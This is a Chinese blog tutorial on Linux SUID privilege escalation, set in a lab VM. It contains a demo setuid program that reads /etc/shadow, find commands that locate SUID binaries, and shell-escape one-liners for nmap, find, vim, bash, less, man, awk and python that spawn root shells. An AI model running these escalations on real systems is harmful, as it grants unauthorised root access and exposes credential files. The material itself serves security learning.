104.网络安全渗透测试—[权限提升篇2]—[Linux之SUID提权]

最新推荐文章于 2022-11-06 18:14:21 发布
最新推荐文章于 2022-11-06 18:14:21 发布
阅读量4.1k 收藏 7
点赞数
分类专栏: # 1.网络安全渗透测试-[持续更新] 文章标签: find suid提权 python suid提权 nmap suid提权 bash suid提权 Linux之SUID提权详解
clqwsn
本文链接:https://blog.csdn.net/qq_45555226/article/details/122951331
版权

我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!!

文章目录

一、LINUX SUID提权

1、SUID简介

       SUID是一种特殊的文件属性,它允许其他用户在执行文件的时候,以该文件的拥有者的身份运行。

       SUID是一种对二进制程序进行设置的特殊权限,可以让二进制程序的执行者临时拥有属主的权限(仅对拥有执行权限的二进制程序有效)。

       例如,所有用户都可以执行passwd命令来修改自己的用户密码,而用户密码保存在/etc/shadow文件中。仔细查看这个文件就会发现它的默认权限是000,也就是说除了root管理员以外,所有用户都没有查看或编辑该文件的权限。但是,在使用passwd命令时如果加上SUID特殊权限位,就可让普通用户临时获得程序所有者的身份,把变更的密码信息写入到shadow文件中。这很像我们在古装剧中见到的手持尚方宝剑的钦差大臣,他手持的尚方宝剑代表的是皇上的权威,因此可以惩戒贪官,但这并不意味着他永久成为了皇上。因此这只是一种有条件的、临时的特殊权限授权方法。

2、SUID测试

(1)实验环境
靶机环境:虚拟机Ubuntu-15.5.04-3.19.0-15-generic
(2)靶机suid提权环境测试

【以 root进行编译和权限设置】

第一步: 编辑suid-demo.c源代码

#include <stdlib.h>
#include <unistd.h>
int main()
{
	setuid(0);	//设置suid为0,也就是run as root
	system("id");
	system("cat /etc/shadow");
}

第二步: 编译gcc suid-demo.c -o suid-demo
在这里插入图片描述

第三步: 设置suid位chmod 4775 suid-exp
在这里插入图片描述

第四步: ls 查询文件,注意s属性标识这个程序有suid的属性

在这里插入图片描述

第五步: 使用find / -perm -u=s -type f 2>/dev/null命令来查询根本目录下所有带用suid属性的文件
在这里插入图片描述

【普通用户执行】

第六步: 切换到普通用户moonteam,再去执行suid-demo,发现此时是以root的权限执行的该二进制文件
在这里插入图片描述

(3)总结

          若靶机上的某个二进制命令文件,没有在root下设置suid临时权限,我们可以su root切换到root用户,然后输入chmod 4775 某命令文件,即可设置suid提权的环境!!!
在这里插入图片描述

3、SUID提权

(1)提权原理

          简单理解为,一个文件有s标志(权限中包含s),并且对应的是root权限,那么当运行这个程序时就有root权限,且这个程序还能执行命令。此时就能从普通用户提升到root权限了!!!

(2)可用于suid提权的命令
Nmap
Vim
find
Bash
More
Less
cp
Nano
Man
Awk
Perl
Python
Tcmdump
(3)查找具有root权限的SUID的二进制可执行命令文件

姿势1:find / -user root -perm -4000 -print 2>/dev/null

姿势2:find / -perm -u=s -type f 2>/dev/null
在这里插入图片描述

姿势3:find / -user root -perm -4000 -exec ls -ldb {} \;

(4)nmap命令提权姿势

          旧版本的Nmap(2.02至5.21)具有交互模式,允许用户执行shell命令。若Nmap在使用root权限执行的二进制文件列表中,也就是在root权限下设置了SUID临时权限,则可以使用交互式控制台来运行具有相同权限的shell。

第一步:nmap -v
在这里插入图片描述

第二步:nmap --interactive
在这里插入图片描述

第三步:nmap>!sh
在这里插入图片描述

(5)find命令提权姿势

          若find在使用root权限执行的二进制文件列表中,也就是在root权限下设置了SUID临时权限,则可以使用-exec参数以root权限执行命令甚至可以开启一个root权限的shell。

第一步:touch demo.txt
在这里插入图片描述

第二步:find demo.txt -exec whoami \;
在这里插入图片描述

第三步:find demo-exec /bin/bash -p \;
在这里插入图片描述

(6)vim命令提权姿势

          Vim是Linux环境下的一款文件编辑器。若vim在root权限下设置了SUID临时权限,则可以在编辑状态下以root权限开启一个shell。

第一步:vim
图略
第二步::shell
图略

(7)bash命令提权姿势

第一步:bash -p
在这里插入图片描述

(8)less/more命令提权姿势

第一步:less或more /etc/passwd
图略
第二步:!/bin/bash或!/bin/sh
图略

(9)cp命令提权姿势

(10)nano命令提权姿势

(11)man命令提权姿势

第一步:man cat
图略
第二步:!/bin/bash或/bin/sh
图略

(12)awk命令提权姿势

第一步:awk 'BEGIN {system("/bin/bash")}'
图略

(13)python命令提权姿势

第一步:python -c 'import os;os.system("/bin/bash")'
图略

qwsn
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[网络安全自学] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一Web渗透的基础性文章,希望对您有所帮助。
2022年中职组网络安全山东省省赛题库后门安装与渗透题目解析
qq_57147160的博客
03-01 6804
B-2任务二:Rootkit后门的利用任务环境说明:●服务器场景:Server2(封闭靶机)●服务器场景操作系统:未知 通过本地PC中渗透测试平台Kali对服务器场景进行系统服务及版本扫描11/25渗透测试,并将该操作显示结果中SSH服务版本信息字符串作为FLAG提交; 2.通过本地PC中渗透测试平台Kali对服务器场景进行SSH暴力破解,将破解成功的密码作为FLAG提交;(用户名:root,字典文件/usr/share/wordlists/dirb/small.txt) 3
查询系统中suid/sgid程序
l4kjih3gfe2dcba1的博客
04-15 1263
查询系统中suid/sgid程序 靶机配置了ssh,可以账号test、密码123通过ssh登录到靶机进行攻击。(靶机IP地址见题目中网络拓扑图) 在Linux系统中文件的权限是很重要的一部分,通常的权限由读、写、执行三位组成,对每个文件都指定了文件所有者、同用户组的权限和其它非本用户组的权限。同时Linux中还有特殊的suid、sgid权限。设置了suid/sgid权限的文件,任何用户在执行该文件时,都将拥有文件属主/属组账号对应的权限。 在靶机环境中,设置有一个属于root用户,同时设置了suid权限的文
详细|Linux提权总结
st3pby的博客
11-06 5598
Linux提权总结
小迪渗透&权限提升(捌)
weixin_41665162的博客
09-03 1088
文章目录58. 网站权限后台漏洞第三方获取(58-64)具体有哪些权限需要我们知道和了解掌握的?演示案例: 58. 网站权限后台漏洞第三方获取(58-64) 当前知识点在渗透流程中的点 前面-中期-后期对应知识关系 当前知识点在权限提升的重点 知识点顺序,理解思路,分类介绍等 当前知识点权限提升权限介绍 注重理解当前权限对应可操作的事情 利用成功后的思想需要总结的思路 相关的操作被拒绝无法实现的时候就会涉及到权限提升 具体有哪些权限需要我们知道和了解掌握的? 后台权限,网站权限,数据库权限,接口权限,系
linux 目录提权,【安全科普】Linux提权——利用可执行文件SUID
weixin_31861065的博客
04-29 480
预估稿费:90RMB投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿SUIDSUID(设置用户ID)是赋予文件的一种权限,它会出现在文件拥有者权限的执行位上,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。那么,为什么要给Linux二进制文件设置这种权限呢?其实原因有很多,例如,程序ping需要root权限才能打开网络套接字,但执行该程序的用户通常都是由普通...
linux suid提权原理,对SUID提权Root Shell的探究
weixin_35455135的博客
05-13 267
SUIDLinux的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具来进行root提权。已知的可以用来提权Linux可执行文件有:ØNmapØVimØfindØBashØMoreØLessØNanoØcp下面的命令可以发现所有的系统中运行的SUID可执行文件find / -user root -per...
红队笔记之权限提升技术要点总结
明光札记
01-04 481
权限提升基本思路与极少要点总结
Linux使用suid vim.basic文件实现提权
09-14
主要介绍了Linux使用suid vim.basic文件实现提权,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
Linux提权手法总结以及 Linux提权exp集合
02-22
Linux常见提权总结包括(内核漏洞提权suid提权、定时任务提权、sudo提权等等)
Linux基础课件特殊权限设置SUID权限共10页.pdf
11-21
Linux基础课件特殊权限设置SUID权限共10页.pdf.zip
【PwnKit】CVE-2021-4034-Linux提权脚本
01-27
Qualys研究团队在polkit的pkexec中发现了内存损坏漏洞,pkexec是一个SUID根程序,默认安装在每个主要Linux发行版上。这个易于利用的漏洞允许任何非特权用户通过在默认配置中利用该漏洞来获得脆弱主机上的完全的root...
48.网络安全渗透测试—[穷举11]—[webshell密码破解(asp/aspx/php)]
热门推荐
qwsn
08-07 63万+
我认为:无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、burpsuite2.0 webshell密码破解办法 1、目标1: `http://www.yijuhua.com/b.asp` 2、目标2:`http://www.yijuhua.com/b.php` 3、目标3:`http://www.yijuhua.com/b.aspx`
103.网络安全渗透测试—[权限提升1]—[Linux内核漏洞提权]
qwsn
02-15 7136
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、LINUX 内核漏洞提权 1、漏洞背景: 2、漏洞利用: (1)实验环境 (2)靶机链接 (3)突破MIME类型限制文件上传获取webshell (4)创建交互式shell (5)查看linux发行版 (6)查找可用的提权exp (7)进行提权 (8)切换shell
82.网络安全渗透测试—[SQL注入21]—Oracle+JSP-pipe.receive_message延时注入
qwsn
01-21 6903
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、Oracle+JSP 延时注入 1、简介 2、注入技巧 二、pipe.receive_message 延时注入示例 1、判断是否存在注入 2、猜解长度并逐个猜解字符 3、以上可以替换的SQL语句
35.网络安全渗透测试—[信息收集4]—[端口扫描/常见端口服务]
qwsn
08-05 6748
为什么要端口扫描:一般在知道服务器开放了哪些端口后,就知道服务器开启了哪些服务。
98.网络安全渗透测试—[常规漏洞挖掘与利用14]—[SESSION身份验证绕过漏洞与测试]
qwsn
02-05 5891
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、session身份验证绕过漏洞与测试 1、session机制 2、session的生命周期 3、出现漏洞的情景 4、session身份验证绕过示例: (1)源码:`session.php` (2)绕过:`抓包改包` (3)总结:
97.网络安全渗透测试—[常规漏洞挖掘与利用13]—[COOKIE身份验证绕过漏洞与测试]
qwsn
02-04 5667
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、cookie身份验证绕过漏洞 1、cookie的作用 2、机制的区别 3、cookie的分类 4、cookie身份验证绕过漏洞 5、cookie身份验证绕过漏洞测试 (1)漏洞源码:`cookie.php` (2)绕过方法:`抓包改包`
125.网络安全渗透测试—[CMS后台 getwebshell]—[南方数据 nfsj v18后台 getwebshell]
qwsn
07-11 5603
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 进入后台---->系统管理---->网站信息设置---->上传网站log---->选择asp图片马(密码为123)使用Burp抓包---->送入Reapeater模块---->SaveToPath的值修改为: (截断记得url解码)---->发送该包并且放开拦截---->asp马位置:传送门......
linux suid提权
最新发布
03-16
这种特性可以被滥用来进行提权攻击,即攻击者通过执行一个SUID文件来获取root权限。在Linux系统中,SUID文件通常是一些系统工具,如passwd、ping等。攻击者可以通过利用这些工具的漏洞来获取root权限。为了防止SUID...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

qwsn

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值